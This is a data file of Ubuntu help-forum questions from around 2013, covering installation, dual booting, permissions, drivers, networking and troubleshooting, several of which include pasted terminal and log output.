331899	does ubuntu install on gpt hard drive ?	i recently tried to install window 7 , downgrading from windows 8 but the hard drive rejected the os , telling me that gpt hdd does not support win7 . i was wondering if ubuntu can be installed instead for now . thank you
331905	changed home permissions	during an install of ubuntu 13.04 . i had my home partition deleted by the operating system . 13.04 install had reformatted the whole drive . i managed to recover & get my home partition onto a removable drive using puppy linux ( thanks puppy ) .i formatted my hard drive & again made a separate partition for my home directory . i copied the home files from the removable drive to the new partition . i can not access my home files from the new ubuntu install . i get a message that the file is root , & i do not have permission . i used puppy to change the permissions , i can now get access but each file has a `` padlock icon '' in the corner . i cant change the permission with su in ubuntu . have spent hours trying to no avail . am in 70s & hate the terminal command line . could someone please help me to get rid of the **padlock . is there an alternative to ubuntu that is not so restrictive with su permissions & preferably has a graphical interface for root ? . frustrated .
331907	upgrade to ubuntu 12.04	i am using ubuntu 10.04.3 , now i want to upgrade to ubuntu 12.04.2 as some software 's which i need for my academic purpose ca n't be installed in this version . i have a problem upgrading through the gui method of using the update manager as it gives 403 forbidden error . is there exists any other way may be through the terminal ... ...
331919	how does one go about getting permissions for installing zipped files from a cd .	i am trying to unzip zipped files on a cd to install in a program on my computer . it keeps telling me i do n't have permissions . i try to reset the permissions but it only gets worse . i tell it to make it create and remove files and it changes it to none . how quirky is that ? help , help , help ! ! ! ! ! ! thanks bill
331920	sudo apt-get/update manager error	i freshly installed distro , i ran a terminal command and ever since i 've been having problems . the terminal command i entered was `` echo off `` deb http : //archive.canonical.com/ubuntu/ $ ( lsb_release -cs ) /partner packages '' | sudo tee -a /etc/apt/sources.list '' i honestly ca n't even remember why i was doing this again but it was something i found off a forum . ever since i entered the command , sudo apt-get update does n't work , and update manager has an error . stating the following.. an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : type 'off ' is not known on line 57 in source list /etc/apt/sources.list , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . ' i wish there were an undo type of button for terminal , but that 's why i 'm here . any help would be greatly appreciated . i 'm trying to reverse this problem i 've got myself into . thanks .
331927	will it dual boot in lenovo ideapad z400 touch and will touchscreen functions work	has anyone tried dual booting lenovo z400 touch ideapad with ubuntu 13.04 and what are the bugs
331930	partitioning to the `` left '' after deleting a windows partition ?	i deleted my windows partition so i can make more space for my ubuntu partition ( making the switch out of windows . ) but i found out that you ca n't resize to the left , is there any way i can use the unallocated space ? ( that 's why i added the quotes around left in the question ) if you need an image ...
331936	dual boot on acer chromebook	i am using an acer chromebook . i have switched operating systems to ubuntu 12.04 but could n't watch netflix so someone told me there is a way to dual boot so wen my laptop comes on , i can choose which operating system . i would love that and use ubuntu 12.04 ( or higher ) and chrome os . i 've searched and cant find anything of how to do it . has someone does this or know where to look ? thanks m .
331937	how can i reduce boot up time to display xsession as soon as possible ?	i am using ubuntu-12.04-armhf ( presize ) on arm platform . i am running a xsession on it . my current booting time is 13 sec . i want to reduce it to as less as possible . please , i need help . thanks in advance .
331938	sudo nautilus command is not working properly in ubuntu 13.04	though i tried many commands to overcome this warining but am unable to overcome them so help me to get rid of this warnings root @ radhika-m68mt-d3 : ~ # sudo nautilus ( nautilus:2642 ) : ibus-warning ** : the owner of /home/radhika/.config/ibus/bus is not root ! nautilus-share-message : called `` net usershare info '' but it failed : 'net usershare ' returned error 255 : net usershare : can not open usershare directory /var/lib /samba/usershares . error no such file or directory please ask your system administrator to enable user sharing .
331939	program for ubuntu that opens .mbf format ?	i just cleaned up a computer and installed linux on it in place of vista . i made a backup of everything that was needed to be kept on a usb and transferred it to linux . now the only files that i have that are n't supported are some microsoft money files . the file format is .mbf . is there an alternative program for microsoft money that is available for ubuntu that can open and read these files just as effectively ? i 'll most likely be installing windows 7 over linux if the version of 7 i have is compatible , since this will be a general house computer with multiple users , so the issue will be resolved that way . however , i 'd personally like to keep linux on it in place of windows , so if there is a program for it i can do that instead . thanks for any help ! it 's always appreciated .
331942	how to install diamond xtremesound 5.1. sound card driver for 12.04 ?	i bought a diamond xtremesound 5.1 sound card . i am looking for the driver for the sound card to install in ubuntu 12.04 .
331946	no sound on 13.04 except when ( un ) plugging power chord	the only sound working properly is the power-beep . if there 's music playing and i unplug my laptop then i can hear it for that half a second that the power beep makes a sound , so it seems that something is blocking my audio from getting to the speakers . i had this problem with 12.04 as well . i 've reloaded and reinstalled alsa/pulseaudio . all the alsamixer/pavucontrols look fine to me . it briefly worked , when i first switched from unity to gnome-shell and when i upgraded from 12.04 to 13.04 , but now i have the same problem . please help .
331947	i installed ubuntu 13.04 alongside with windows 8 64bit but after installation i cant boot ubuntu ?	so i have always been a windows user and this was my first time installing a linux based os to my computer . after watching a tutorial on youtbe and reading the guide on the ubuntu website the installation seemed straight forward and for the most part it was , after succesfully installing ubuntu alongside windows 8 ubuntu promped me to restart my computer so i did , after it restarted instead of giving me a screen where i can choose wich os i can boot it just went straight to windows 8 , i have no idea how to run the ubuntu i installed because every time i restart it goes straight to windows . i am kind of sad because i allocated 100gb of hdd space to ubuntu and it would be a shame that i wont be able to get it back . can anyone help me with this . i am 100 % new to linux . if needed these are my pc specs intel i7-3632qm quad core 64bit 8gb ram ddr3 1tb hdd hp envy m4 laptop
331962	two boot loaders . want the original one	i just installed elementary os to my pc alongside with ubuntu 13.04. sdb1 - ubuntu sdb4 - eos my problem is that ubuntu 's grub has been overwritten.. and the new one boots by default into eos . how can i re-install ubuntu 's grub ? ( ubuntu 's grub hides old kernels and boots into ubuntu default )
331963	can ubuntu 12.04 lts/13.04 be installed on asus k55vm-sx086d ?	i 'm new to ubuntu . is it possible to install ubuntu 13.04 or 12.04 on asus k55vm-sx086d laptop ? does ubuntu work properly on the above laptop ?
331964	install elixir to system	how can i install elixir on ubuntu 13.04 so that i can easily use it from the command line and update it easily by cloning git . i have installed erlang 16 by getting package from here erlang downloads there is a source elixir git here https : //github.com/elixir-lang/elixir i can clone it and use it by navigating to the bin directory but how do i set it up so it is available to the system from bash ?
331965	does ubuntu supports tamil language ?	i have installed i-bus.for typing purpose i need to install tamil uni code.but i could n't see tamil language listed in the i-bus preferences.help me install language packs
331967	newbie questions about linux server	hi i am new to linux and just trying to get to learn it a bit more i am in no way a computer amatuer just when it comes to linux anyways i want to setup a home file server it basically will just be for storage of files and streaming them over the network and the occasional usenet download i am looking at several options and because i am new i want to go with a gui until i am more comfortable what i was looking at was using lubuntu however it does not have a lts version so i was thinking of using the lts of ubuntu server and then installing the lubuntu desktop over the top however i have a few questions once i install this gui will it still access the lts sources so it is supported for the full lts period ( 2016-2017 if i remember correctly ) is there any real difference between the desktop and server editions of ubuntu apart from gui vs cli and different software ( will i notice any performance or network throughput by choosing the server edition over the desktop edition ) i am just trying to see what advantages the ubuntu server edition has over the desktop
331968	recommended auto-mounter for tiling window managers ?	what is the recommended way to automatically mount usb drives , optical media , hard drives , etc ... with a tiling window manager on ubuntu ? i am a big fan of tiling window managers , but i always look like a damn fool whenever someone walks up to me with a usb key and i furiously start typing commands to create the mountpoint , figure out the name of the device in /dev , mount , etc ... . i am currently using i3 , but since this is a bigger issue for me than the differences between awesome/i3/dwm ...
331969	when i installed ubuntu to replace windows 7 , i could nolonger see my backup disk d and all my data seems to be lost . can i recover the data ?	i first installed ubuntu and i used it alongside windows and it was okey ! later my windows got issues and i installed again windows 7 . after this i could no longer boot with ubuntu . so i decided to installed again hoping it would again work peacefully alongside windows . this time however ubuntu did not give me the option of co-existing with windows , but i went on with the installation any way . after installation i discovered i could nolonger see my backup disk d. all my data was gone . i tried using testdisk but it ca n't install . what can i do.please help me ; the data i lost is too much ! ! ! ! ! ! ! djosh
331973	removing lubuntu splash screen from unity/gnome on ubuntu 12.04	i'am running a 64 bit version of ubuntu 12.04 lts on a sony vaio with 8gb of ram & 500gb hdd . i had recently installed the lubuntu and kde desktop environments but was not very impressed with either of them so i removed them both and went back to choosing between unity and gnome . however , when i boot my computer am getting the blue lubuntu splash screen instead of the regular default 12.04 unity screen . how can i get rid of this lubuntu splash screen ?
331975	how can we make our ubuntu server router as gateway mode to router mode ?	based on this sample guide link : http : //ubuntulinux.co.in/blog/ubuntu/nat-configuration-with-iptables-in-ubuntu/ with this code : iptables –append forward –in-interface eth1 -j accept it means that `` all pc’s on the private office network should set their “gateway” to be the local private network ip address of the linux gateway computer . '' how can we make our ubuntu server router gateway mode to router mode ? in order our private networks is visible from other networks or different subnet . scenario : + -- -+ eth1-*.1.2| s | + -- -- -- -- -- + *1.1router===switch=========| | | | -- -- -- pc1 || | / |private net| switch | -- -- -- pc2 || | |===========| | -- -- -- pc3 || | r |eth0-*.0.1 + -- -- -- -- -- + || + -- -+ *.1.3 router || || *.7.1 other network s/r : server as router 192.168.x.x eth1 : connection from the internet/other network eth0 : internal/private network pc1 , pc2 , pc3 : w/ ip add .0.x
331977	should unplug/replug wireless mouse many times to be recognized	i use ubuntu 13.04 with an a4tech wireless mouse model g9-250 . everytime i wakeup my laptop i should unplug and replug the wireless adaptor many times in order to be recoginzed by os . this is dmesg output after recognition : [ 352137.492234 ] usb 3-2 : usb disconnect , device number 33 [ 352157.735602 ] usb 3-3 : new full-speed usb device number 43 using xhci_hcd [ 352157.753391 ] usb 3-3 : new usb device found , idvendor=09da , idproduct=054f [ 352157.753398 ] usb 3-3 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 352157.753402 ] usb 3-3 : product : usb device [ 352157.753405 ] usb 3-3 : manufacturer : a4tech [ 352157.755581 ] input : a4tech usb device as /devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3:1.0/input/input52 [ 352157.755799 ] hid-generic 0003:09da:054f.0013 : input , hiddev0 , hidraw0 : usb hid v1.11 keyboard [ a4tech usb device ] on usb-0000:00:14.0-3/input0 [ 352157.756965 ] input : a4tech usb device as /devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3:1.1/input/input53 [ 352157.757155 ] hid-generic 0003:09da:054f.0014 : input , hidraw1 : usb hid v1.11 mouse [ a4tech usb device ] on usb-0000:00:14.0-3/input1 [ 352166.764136 ] usb 3-3 : usb disconnect , device number 43 [ 352168.897210 ] usb 3-2 : new full-speed usb device number 44 using xhci_hcd [ 352168.915140 ] usb 3-2 : new usb device found , idvendor=09da , idproduct=054f [ 352168.915157 ] usb 3-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 352168.915168 ] usb 3-2 : product : usb device [ 352168.915177 ] usb 3-2 : manufacturer : a4tech [ 352168.917798 ] input : a4tech usb device as /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.0/input/input54 [ 352168.918416 ] hid-generic 0003:09da:054f.0015 : input , hiddev0 , hidraw0 : usb hid v1.11 keyboard [ a4tech usb device ] on usb-0000:00:14.0-2/input0 [ 352168.919721 ] input : a4tech usb device as /devices/pci0000:00/0000:00:14.0/usb3/3-2/3-2:1.1/input/input55 [ 352168.919978 ] hid-generic 0003:09da:054f.0016 : input , hidraw1 : usb hid v1.11 mouse [ a4tech usb device ] on usb-0000:00:14.0-2/input1 [ 352184.549097 ] usb 3-2 : usb disconnect , device number 44 [ 352217.749954 ] usb 3-1 : new full-speed usb device number 45 using xhci_hcd [ 352217.768024 ] usb 3-1 : new usb device found , idvendor=09da , idproduct=054f [ 352217.768031 ] usb 3-1 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 352217.768036 ] usb 3-1 : product : usb device [ 352217.768039 ] usb 3-1 : manufacturer : a4tech [ 352217.770489 ] input : a4tech usb device as /devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:1.0/input/input56 [ 352217.771071 ] hid-generic 0003:09da:054f.0017 : input , hiddev0 , hidraw0 : usb hid v1.11 keyboard [ a4tech usb device ] on usb-0000:00:14.0-1/input0 [ 352217.772558 ] input : a4tech usb device as /devices/pci0000:00/0000:00:14.0/usb3/3-1/3-1:1.1/input/input57 [ 352217.772798 ] hid-generic 0003:09da:054f.0018 : input , hidraw1 : usb hid v1.11 mouse [ a4tech usb device ] on usb-0000:00:14.0-1/input1 is there anyway to fix this problem ? it was working in previous versions of ubuntu .
331980	how to increase ubutnu 's disk space ?	i have ubuntu 13.04 32 bit and i want to increase my disk space.i installed ubuntu alongside of windows ( not wubi ) in my 250 gb sata hdd yesterday i deleted windows 7 partion in hope of giving my ubuntu installation more space and when i opened gparted , to my surprise there were 2 ext4 partition and i can not decide which to choose and allocate free space.please help.here is the screenshot of gparted ! after moving swap i can not move my extended partition as gparted throw error -- '' unable to satisfy all constrains on the partitions '' .
331985	macro to paste pre-configured text	i am looking to avoid ever typing in my email address again . is there a way to configure a key to paste some pre-set bit of text like my email . i 'd like this to work across all applications ideally . thanks
331987	deleted the .wine folder and lost all my data	help ! i deleted the .wine folder from my user folder and i 've lost all my data . how can i get my files back ? what happened ? i use ubuntu 12.04 ! i do n't know much about ubuntu yet . thank you
331999	transfer a file from remote server to remote server	i am trying to transfer a file from site5 to godaddy web hosting account . the godaddy webhosting account is the one that comes free with the domain , so no ssh acccess . sudo scp -v @ : /home//wordpress.tar -o 'stricthostkeychecking no ' @ www.domain.com : /home/content/m/c/o//wordpress.tar the destination is a godaddy free hosting acccount , and the username on it is the ftp user name . i am getting the following error when i try to enter the password of the godaddy ftpuser debug1 : authentications that can continue : publickey , password , keyboard-interactive debug1 : next authentication method : publickey debug1 : trying private key : /root/.ssh/id_rsa debug1 : trying private key : /root/.ssh/id_dsa debug1 : trying private key : /root/.ssh/id_ecdsa debug1 : next authentication method : keyboard-interactive debug1 : authentications that can continue : publickey , password , keyboard-interactive debug1 : next authentication method : password mconsys @ www.mcruiseon.com 's password : debug1 : authentications that can continue : publickey , password , keyboard-interactive permission denied , please try again . mconsys @ www.mcruiseon.com 's password : debug1 : authentications that can continue : publickey , password , keyboard-interactive permission denied , please try again . mconsys @ www.mcruiseon.com 's password : debug1 : authentications that can continue : publickey , password , keyboard-interactive debug1 : no more authentication methods to try . permission denied ( publickey , password , keyboard-interactive ) . lost connection what am i doing wrong here ? edit ( some more to help debug the issue ) when i try using ftpzilla , with ftp port it connects to the server fine . as soon as i put port 22 , it accepts the rsa thingy and gives a error . response : fzsftp started command : open `` mconsys @ www.mcruiseon.com '' 22 command : trust new hostkey : once command : pass : ************ error : authentication failed . error : critical error error : could not connect to server edit 2 ftp from the ssh enabled site5 server , gives the following error ftp mconsys @ www.mcruiseon.com ftp : mconsys @ www.mcruiseon.com : unknown host
332009	magnet links in firefox ( ubuntu 13.04 )	i know this has been asked quite a few times already , however , i still do n't have it working . i 'm using qbittorrent as my torrent program , and i want to be able to open magnet links in firefox . i already chose qbittorrent as my magnet application handler ( in firefox preferences - applications . i chose qbittorrent , located in /usr/bin/ ) . it 's not working . whenever i click on `` download torrent '' , nothing happens . any ideas ? now that i took another look on my firefox preferences , i see that `` magnet '' has still `` always ask '' as its value . i tried to change it , but i ca n't . it always goes back to `` always ask '' .
332011	i restored to default in the bios , now i ca n't install ubuntu	i wiped my entire system through the bios by restoring to default and now i want to install ubuntu on my laptop ( 64-bit asus zenbook ) . there 's nothing on it , when i turn it on it automatically goes to the bios . this is a completely new laptop and i actually installed ubuntu 12.04 on it before the reformatting , with the same bootable usb i 'm using now . the laptop has a 24 gb ssd and a 500 gb hdd , it came with win8 on the ssd and i did n't want win on it , that 's why i reformatted it . i can see both drives in the bios . when i installed 12.04 the first time , i placed it on the hdd . i 'd like to put 12.04 on the ssd . the sata is set to achi , so that should be ok . i have a bootable usb with 12.04 and the laptop correctly shows the start menu where i can choose between trying ubuntu , installing ubuntu or checking the desk . no matter what option i pick , the screen just goes to black and nothing happens ( i 've waited more than 10 minutes ) . what i can see is this any ideas ? do i need to install something before i can install ubuntu ? thank you . info about the laptop : asus zenbook ux32a r3013h intel® core™ i5 3317u processor , integrated intel® hd graphics 4000 , 500gb hdd with 24 gb ssd specifications
332012	problem with pdf file opening in terminal	when i tried to open a pdf file in terminal using xpdf i get segmentation fault error . how do i solve this ? here is the command and error message : xpdf 320lecture10.pdf ***** mediabox = ll:0,0 ur:612,792 ***** cropbox = ll:0,0 ur:612,792 ***** rotate = 0 segmentation fault ( core dumped )
332016	warning : date ( ) : it is not safe to rely on the system 's timezone settings - what just happen ?	warning : date ( ) : it is not safe to rely on the system 's timezone settings . you are required to use the date.timezone setting or the date_default_timezone_set ( ) function . in case you used any of those methods and you are still getting this warning , you most likely misspelled the timezone identifier . we selected the timezone 'utc ' for now , but please set date.timezone to select your timezone . in /var/www/folder/script/controllers/ac.php on line 342 and at the script return date ( 'm/d/y h : i : s ' , $ tm ) ; what should i do ?
332018	jack error starting server using firewire drivers	i 've been trying to setup an edirol fa-66 audio interface in ubuntu 12.04 lts , so that i can record sound coming from two microphones conected to it . the interface is connected to my computer using a firewire cable . thanks in advance for your interest and help ! i followed this firewire digital audio tutorial ( i skipped the set irq priorities section , i 'm not interested in realtime ) , after installing ffado , jack and qjackctl , but i get an error i can not solve . when i start qjackctl ( with root privileges ) , apply the settings described in the start jack section of the above tutorial and click the start button , i get an error window and another after i close the first . also , there are these errors in the messages window of qjackctl . 18:43:18.581 alsa connection change . 18:43:18.605 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started 18:43:18.617 alsa connection graph change . 18:43:23.877 d-bus : jack server could not be started . sorry mon aug 12 18:43:21 2013 : starting jack server ... mon aug 12 18:43:21 2013 : jack server starting in realtime mode with priority 10 can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started mon aug 12 18:43:23 2013 : [ 1m [ 31merror : firewire err : ffado : error creating virtual device [ 0m mon aug 12 18:43:23 2013 : [ 1m [ 31merror : can not attach audio driver [ 0m mon aug 12 18:43:23 2013 : [ 1m [ 31merror : jackserver : :open ( ) failed with -1 [ 0m mon aug 12 18:43:23 2013 : [ 1m [ 31merror : failed to open server [ 0m mon aug 12 18:43:23 2013 : saving settings to `` /home/casir/.config/jack/conf.xml '' ... 18:43:30.507 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started first , i know the firewire board is working correctly , because i can get video from two firewire cameras connected to the same board . second , i know the edirol audio interface is being recognized , because when i run the command sudo ffado-test listdevices , it produces the following output : === 1394 port 0 === node id guid vendorid modelid vendor - model 0 0x000a47010f069020 0x00000a47 0x00000000 - 1 0x000a47010f06901f 0x00000a47 0x00000000 - 2 0x001106000000d9ff 0x00001106 0x00000000 linux firewire - 3 0x0040ab0000c33a09 0x000040ab 0x00010049 edirol - edirol fa-66 third , i modified the /etc/pulse/client.conf to contain the line autospawn = no , killed the pulseaudio process , verified that it was not running anymore and restarted qjackctl . i still got the same error windows and messages . fourth , this is the sudo ffado-diag output . i 'm not really sure of what some of these things mean , but it seems to me that every necessary library is installed and was found . ffado diagnostic utility 2.999.0- ============================ ( c ) 2008 pieter palmers 2009-2010 arnold krille === check === base system ... kernel version ... ... ... ... 3.2.0-51-generic old 1394 stack present ... . false old 1394 stack loaded ... .. false old 1394 stack active ... .. false new 1394 stack present ... . true new 1394 stack loaded ... .. true new 1394 stack active ... .. true /dev/raw1394 node present . false prerequisites ( dynamic at run-time ) ... gcc ... ... ... ... ... gcc ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 g++ ... ... ... ... ... g++ ( ubuntu/linaro 4.6.3-1ubuntu5 ) 4.6.3 pyqt4 ( by pyuic4 ) . sh : 1 : pyuic4 : not found jackd ... ... ... ... . home directory /home/casir not ours . path ... ... ... ... /usr/bin/jackd flags ... ... ... .. package jack was not found in the pkg-config search path . perhaps you should add the directory containing `jack.pc' to the pkg_config_path environment variable no package 'jack ' found libraw1394 ... ... .. 2.0.5 flags ... ... ... .. -i/usr/local/include -l/usr/local/lib -lraw1394 libavc1394 ... ... .. 0.5.3 flags ... ... ... .. -i/usr/local/include -l/usr/local/lib -lavc1394 -lrom1394 -lraw1394 libiec61883 ... ... . 1.2.0 flags ... ... ... .. -i/usr/local/include -l/usr/local/lib -liec61883 -lraw1394 libxml++-2.6 ... ... 2.34.1 flags ... ... ... .. -i/usr/include/libxml2 -i/usr/include/glibmm-2.4 -i/usr/lib/x86_64-linux-gnu/glibmm-2.4/include -i/usr/include/sigc++-2.0 -i/usr/lib/x86_64-linux-gnu/sigc++-2.0/include -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -i/usr/include/libxml++-2.6 -i/usr/lib/libxml++-2.6/include -lxml++-2.6 -lxml2 -lglibmm-2.4 -lgobject-2.0 -lsigc-2.0 -lglib-2.0 dbus-1 ... ... ... ... 1.4.18 flags ... ... ... .. -i/usr/include/dbus-1.0 -i/usr/lib/x86_64-linux-gnu/dbus-1.0/include -ldbus-1 -lpthread -lrt prerequisites ( static at compile-time ) ... gcc ... ... ... ... ... gcc ( ubuntu/linaro 4.6.2-14ubuntu2 ) 4.6.2 g++ ... ... ... ... ... g++ ( ubuntu/linaro 4.6.2-14ubuntu2 ) 4.6.2 pyqt4 ( by pyuic4 ) . python user interface compiler 4.9.1 for qt version 4.8.0 jackd ... ... ... ... . sh : 1 : jackd : not found path ... ... ... ... flags ... ... ... .. package jack was not found in the pkg-config search path . libraw1394 ... ... .. 2.0.7 flags ... ... ... .. -lraw1394 libavc1394 ... ... .. package libavc1394 was not found in the pkg-config search path . flags ... ... ... .. package libavc1394 was not found in the pkg-config search path . libiec61883 ... ... . 1.2.0 flags ... ... ... .. -liec61883 -lraw1394 libxml++-2.6 ... ... 2.34.1 flags ... ... ... .. -i/usr/include/libxml2 -i/usr/include/glibmm-2.4 -i/usr/lib/x86_64-linux-gnu/glibmm-2.4/include -i/usr/include/sigc++-2.0 -i/usr/lib/x86_64-linux-gnu/sigc++-2.0/include -i/usr/include/glib-2.0 -i/usr/lib/x86_64-linux-gnu/glib-2.0/include -i/usr/include/libxml++-2.6 -i/usr/lib/libxml++-2.6/include -lxml++-2.6 -lxml2 -lglibmm-2.4 -lgobject-2.0 -lsigc-2.0 -lglib-2.0 dbus-1 ... ... ... ... 1.4.16 flags ... ... ... .. -i/usr/include/dbus-1.0 -i/usr/lib/x86_64-linux-gnu/dbus-1.0/include -ldbus-1 -lpthread -lrt hardware ... host controllers : 0c:07.0 firewire ( ieee 1394 ) [ 0c00 ] : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller [ 1106:3044 ] ( rev 46 ) ( prog-if 10 [ ohci ] ) subsystem : via technologies , inc. vt6306/7/8 [ fire ii ( m ) ] ieee 1394 ohci controller [ 1106:3044 ] control : i/o+ mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping+ serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 32 ( 8000ns max ) , cache line size : 32 bytes interrupt : pin a routed to irq 21 region 0 : memory at d3101000 ( 32-bit , non-prefetchable ) [ size=2k ] region 1 : i/o ports at 3000 [ size=128 ] capabilities : [ 50 ] power management version 2 flags : pmeclk- dsi- d1- d2+ auxcurrent=0ma pme ( d0- , d1- , d2+ , d3hot+ , d3cold+ ) status : d0 nosoftrst- pme-enable- dsel=0 dscale=0 pme- kernel driver in use : firewire_ohci kernel modules : firewire-ohci cpu info : architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 2 on-line cpu ( s ) list : 0,1 thread ( s ) per core : 1 core ( s ) per socket : 2 socket ( s ) : 1 numa node ( s ) : 1 vendor id : genuineintel cpu family : 15 model : 6 stepping : 5 cpu mhz : 3391.369 bogomips : 6783.08 l1d cache : 16k l2 cache : 2048k numa node0 cpu ( s ) : 0,1 configuration ... irq information hardware interrupts : -- -- -- -- -- -- -- -- -- -- irq 0 : pid : none , count : [ 53 , 53 ] , sched none ( priority none ) , drivers : [ 'timer ' ] irq 1 : pid : none , count : [ 3 , 3 ] , sched none ( priority none ) , drivers : [ 'i8042 ' ] irq 6 : pid : none , count : [ 3 , 3 ] , sched none ( priority none ) , drivers : [ 'floppy ' ] irq 8 : pid : none , count : [ 1 , 1 ] , sched none ( priority none ) , drivers : [ 'rtc0 ' ] irq 9 : pid : none , count : [ 0 , 0 ] , sched none ( priority none ) , drivers : [ 'acpi ' ] irq 12 : pid : none , count : [ 5 , 5 ] , sched none ( priority none ) , drivers : [ 'i8042 ' ] irq 14 : pid : none , count : [ 30347 , 30347 ] , sched none ( priority none ) , drivers : [ 'ata_piix ' ] irq 15 : pid : none , count : [ 3567 , 3567 ] , sched none ( priority none ) , drivers : [ 'ata_piix ' ] irq 16 : pid : none , count : [ 1565 , 1565 ] , sched none ( priority none ) , drivers : [ 'nvidia ' ] irq 18 : pid : none , count : [ 1754 , 1754 ] , sched none ( priority none ) , drivers : [ 'ehci_hcd : usb1 ' , 'uhci_hcd : usb4 ' ] irq 20 : pid : none , count : [ 0 , 0 ] , sched none ( priority none ) , drivers : [ 'uhci_hcd : usb3 ' ] irq 21 : pid : none , count : [ 1185 , 1185 ] , sched none ( priority none ) , drivers : [ 'uhci_hcd : usb7 ' , 'firewire_ohci ' ] irq 22 : pid : none , count : [ 429 , 429 ] , sched none ( priority none ) , drivers : [ 'ata_piix ' , 'uhci_hcd : usb6 ' ] irq 23 : pid : none , count : [ 2184 , 2184 ] , sched none ( priority none ) , drivers : [ 'ehci_hcd : usb2 ' , 'uhci_hcd : usb5 ' ] irq 43 : pid : none , count : [ 194 , 194 ] , sched none ( priority none ) , drivers : [ 'snd_hda_intel ' ] irq 44 : pid : none , count : [ 19415 , 19415 ] , sched none ( priority none ) , drivers : [ 'eth0 ' ] software interrupts : -- -- -- -- -- -- -- -- -- -- === report === firewire kernel drivers : the new firewire kernel stack is loaded . this is still kind of experimental . if you encounter problems , please also check with the old stack . if you 're still reading after this wall of text , thank you again ! do n't hesitate in asking for information i might have overlooked , i will provide it as soon as i can . thanks for your help ! edit : i guess there is something wrong with the ffado drivers , as i get the following error messages when i run sudo ffado-dbus-server : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - ffado control dbus service part of the ffado project -- www.ffado.org version : 2.999.0- ( c ) 2008 , pieter palmers this program comes with absolutely no warranty . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - discovering devices ... 07562463157 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07562463194 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07562463203 : error ( bebob_avdevice.cpp ) [ 96 ] probe : number of channels command failed 07562466270 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07562466279 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07562469318 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07562469326 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07562469339 : error ( avc_avdevice.cpp ) [ 89 ] probe : subunit info command failed 07562521750 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07562521770 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07562521774 : error ( bebob_avdevice.cpp ) [ 96 ] probe : number of channels command failed 07562524807 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07562524816 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07562527850 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07562527858 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07562527868 : error ( avc_avdevice.cpp ) [ 89 ] probe : subunit info command failed 07562994197 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07562994222 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07562994228 : error ( bebob_avdevice.cpp ) [ 560 ] getconfigurationidsamplerate : stream format command failed 07563403974 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07563403987 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07563403999 : error ( bebob_avdevice.cpp ) [ 597 ] getconfigurationidnumberofchannel : number of channels command failed 07563813654 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07563813673 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07563813678 : error ( bebob_avdevice.cpp ) [ 597 ] getconfigurationidnumberofchannel : number of channels command failed 07564222639 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07564222651 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07564222663 : error ( bebob_avdevice.cpp ) [ 629 ] getconfigurationidsyncmode : signal source command failed 07564631256 : error ( ieee1394service.cpp ) [ 750 ] dofcptransaction : fcp transaction did n't succeed in 2 tries 07564631276 : warning ( ieee1394service.cpp ) [ 725 ] transactionblock : fcp transaction failed 07564631283 : error ( avc_unit.cpp ) [ 250 ] enumeratesubunits : subunit info command failed 07564631298 : error ( avc_unit.cpp ) [ 177 ] discover : could not enumarate sub units 07564631303 : error ( bebob_avdevice.cpp ) [ 192 ] discover : could not discover unit 07564631312 : error ( devicemanager.cpp ) [ 632 ] discover : could not discover device dbus service running press ctrl-c to stop it & exit thanks again for your time !
